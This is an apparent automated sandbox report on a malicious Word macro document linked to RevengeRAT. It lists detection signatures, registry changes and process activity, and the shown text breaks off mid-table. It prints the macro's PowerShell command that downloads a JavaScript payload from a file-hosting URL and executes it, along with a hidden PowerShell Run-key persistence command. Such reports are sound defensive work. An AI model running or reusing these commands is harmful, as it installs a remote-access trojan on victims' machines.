Analysis Overview
SHA256
861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc
Threat Level: Known bad
The file Flytour.doc was found to be: Known bad.
Malicious Activity Summary
RevengeRAT
Process spawned unexpected child process
Suspicious Office macro
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Indicator Removal: File Deletion
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-01 07:18
Signatures
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-01 07:18
Reported
2024-08-01 07:20
Platform
win7-20240705-en
Max time kernel
116s
Max time network
105s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico | C:\Windows\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4}\2.0\ = "Microsoft Forms 2.0 Object Library" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4}\2.0\HELPDIR | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\TypeLib | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AD69A15D-ECD0-442A-9DCA-5E78BD8725E4}\2.0\0\win32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Wow6432Node | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Flytour.docm"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" test.js
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Network
Files
memory/712-0-0x000000002F201000-0x000000002F202000-memory.dmp
memory/712-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/712-2-0x000000007411D000-0x0000000074128000-memory.dmp
memory/712-5-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-6-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-11-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-10-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-9-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-8-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-7-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-12-0x000000007411D000-0x0000000074128000-memory.dmp
memory/712-13-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-18-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-17-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-16-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-15-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-14-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-21-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-20-0x0000000000300000-0x0000000000400000-memory.dmp
memory/712-19-0x0000000000300000-0x0000000000400000-memory.dmp
memory/1328-25-0x0000000003910000-0x0000000003920000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 8a6f8c523a06eca0d5724bd1263f4a58 |
| SHA1 | 7ebb55dc2e6616ab9f7261be7797a4edba619f97 |
| SHA256 | aa93ace3c86d721a2caf5c8fd538b9e68ea6d5655204154706e90e68173ef3a2 |
| SHA512 | 67b6aefcf516e6d09f8353570049ef1010c461addae447e6e8034adbe017da4aabf271af2bde9688edc881196d08182ad0d1739994f89601dca083c4d13b2836 |
memory/712-46-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/712-47-0x000000007411D000-0x0000000074128000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-01 07:18
Reported
2024-08-01 07:20
Platform
win10v2004-20240730-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
RevengeRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_w = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\isltf.ps1' \";exit" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4076 set thread context of 4360 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
